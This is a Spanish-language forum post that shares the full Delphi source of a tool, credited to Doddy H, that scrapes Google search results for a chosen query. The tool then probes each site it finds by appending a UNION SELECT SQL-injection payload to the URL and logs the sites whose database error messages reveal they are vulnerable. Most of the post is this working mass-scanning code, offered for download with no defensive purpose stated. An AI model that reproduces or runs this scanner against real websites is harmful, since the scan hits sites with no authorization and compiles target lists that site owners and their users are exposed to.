[Delphi] GoogleSearch 0.1

Un simple programa para buscar paginas vulnerables a SQLI usando Google.

Una imagen :
El codigo :
Código
// Google Search 0.1
// Coded By Doddy H
 
unit goo;
 
interface
 
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, sButton, sSkinManager, IdURI, sMemo, PerlRegEx,
  IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, jpeg,
  ExtCtrls, sEdit, sLabel, sGroupBox, sListBox, ComCtrls, sStatusBar, ShellApi,
  IdContext, IdCmdTCPClient;
 
type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    IdHTTP1: TIdHTTP;
    PerlRegEx1: TPerlRegEx;
    PerlRegEx2: TPerlRegEx;
    Image1: TImage;
    sGroupBox1: TsGroupBox;
    sLabel1: TsLabel;
    sLabel2: TsLabel;
    sEdit1: TsEdit;
    sEdit2: TsEdit;
    sGroupBox2: TsGroupBox;
    sListBox1: TsListBox;
    sGroupBox3: TsGroupBox;
    sGroupBox4: TsGroupBox;
    sListBox2: TsListBox;
    sStatusBar1: TsStatusBar;
    sButton1: TsButton;
    sButton2: TsButton;
    sButton3: TsButton;
    sButton4: TsButton;
    PerlRegEx3: TPerlRegEx;
    procedure sButton1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure sListBox1DblClick(Sender: TObject);
    procedure sListBox2DblClick(Sender: TObject);
    procedure sButton4Click(Sender: TObject);
    procedure sButton3Click(Sender: TObject);
    procedure sButton2Click(Sender: TObject);
 
  private
    { Private declarations }
  public
    { Public declarations }
  end;
 
var
  Form1: TForm1;
 
implementation
 
{$R *.dfm}
 
procedure savefile(filename, texto: string);
var
  ar: TextFile;
 
begin
 
  AssignFile(ar, filename);
  FileMode := fmOpenWrite;
 
  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);
 
  Writeln(ar, texto);
  CloseFile(ar);
 
end;
 
procedure TForm1.FormCreate(Sender: TObject);
var
  dir: string;
begin
 
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'falloutstyle';
  sSkinManager1.Active := True;
 
  dir := ExtractFilePath(Application.ExeName) + '/logs';
 
  if not(DirectoryExists(dir)) then
  begin
    CreateDir(dir);
  end;
 
  ChDir(dir);
 
end;
 
procedure TForm1.sButton1Click(Sender: TObject);
var
  code: string;
  link1: string;
  link2: string;
  linkfinal: string;
  z: integer;
  i: integer;
  ii: integer;
  target: string;
  linkfinalfinal: string;
  chau: TStringList;
 
begin
 
  target := StringReplace(sEdit1.text, ' ', '+', []);
 
  sListBox1.Items.Clear;
 
  for i := 1 to StrToInt(sEdit2.text) do
  begin
    ii := i * 10;
 
    sStatusBar1.Panels[0].text := '[+] Searching in page : ' + IntToStr(ii);
    Form1.sStatusBar1.Update;
 
    code := IdHTTP1.Get('http://www.google.com/search?hl=&q=' + target +
        '&start=' + IntToStr(ii));
 
    PerlRegEx1.Regex := '(?<="r"><. href=")(.+?)"';
    PerlRegEx1.Subject := code;
 
    while PerlRegEx1.MatchAgain do
    begin
      for z := 1 to PerlRegEx1.SubExpressionCount do
 
        link1 := PerlRegEx1.SubExpressions[z];
 
      PerlRegEx2.Regex := '\/url\?q\=(.*?)\&amp\;';
      PerlRegEx2.Subject := link1;
 
      if PerlRegEx2.Match then
      begin
        link2 := PerlRegEx2.SubExpressions[1];
        linkfinal := TIdURI.URLDecode(link2);
        sListBox1.Update;
 
        PerlRegEx3.Regex := '(.*?)=(.*?)';
 
        PerlRegEx3.Subject := linkfinal;
 
        if PerlRegEx3.Match then
        begin
          linkfinalfinal := PerlRegEx3.SubExpressions[1] + '=';
          sListBox1.Items.Add(linkfinalfinal);
        end;
 
      end;
    end;
  end;
 
  chau := TStringList.Create;
 
  chau.Duplicates := dupIgnore;
  chau.Sorted := True;
  chau.Assign(sListBox1.Items);
  sListBox1.Items.Clear;
  sListBox1.Items.Assign(chau);
 
  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    savefile('google-search.txt', sListBox1.Items[i]);
  end;
 
  sStatusBar1.Panels[0].text := '[+] Done';
  Form1.sStatusBar1.Update;
 
end;
 
procedure TForm1.sButton2Click(Sender: TObject);
var
  i: integer;
  code: string;
 
begin
 
  sListBox2.Items.Clear;
 
  sStatusBar1.Panels[0].text := '[+] Loading ...';
  Form1.sStatusBar1.Update;
 
  for i := sListBox1.Items.Count - 1 downto 0 do
  begin
    try
      begin
 
        sStatusBar1.Panels[0].text := '[+] Scanning : ' + sListBox1.Items[i];
        Form1.sStatusBar1.Update;
        sListBox2.Update;
 
        code := IdHTTP1.Get(sListBox1.Items[i] + '-1+union+select+1--');
 
        PerlRegEx1.Regex :=
          'The used SELECT statements have a different number of columns';
        PerlRegEx1.Subject := code;
 
        if PerlRegEx1.Match then
        begin
          sListBox2.Items.Add(sListBox1.Items[i]);
          savefile('sqli-founds.txt', sListBox1.Items[i]);
        end;
 
      end;
    except
      on E: EIdHttpProtocolException do
        ;
      on E: Exception do
        ;
    end;
 
    sStatusBar1.Panels[0].text := '[+] Done';
    Form1.sStatusBar1.Update;
 
  end;
 
end;
 
procedure TForm1.sButton3Click(Sender: TObject);
begin
  ShowMessage('Contact to lepuke[at]hotmail[com]');
end;
 
procedure TForm1.sButton4Click(Sender: TObject);
begin
  Form1.Close();
end;
 
procedure TForm1.sListBox1DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'google-search.txt', nil, nil, SW_SHOWNORMAL);
end;
 
procedure TForm1.sListBox2DblClick(Sender: TObject);
begin
  ShellExecute(Handle, 'open', 'sqli-founds.txt', nil, nil, SW_SHOWNORMAL);
end;
 
end.
 
// The End ?
Si quieren bajar el programa lo pueden hacer de aca.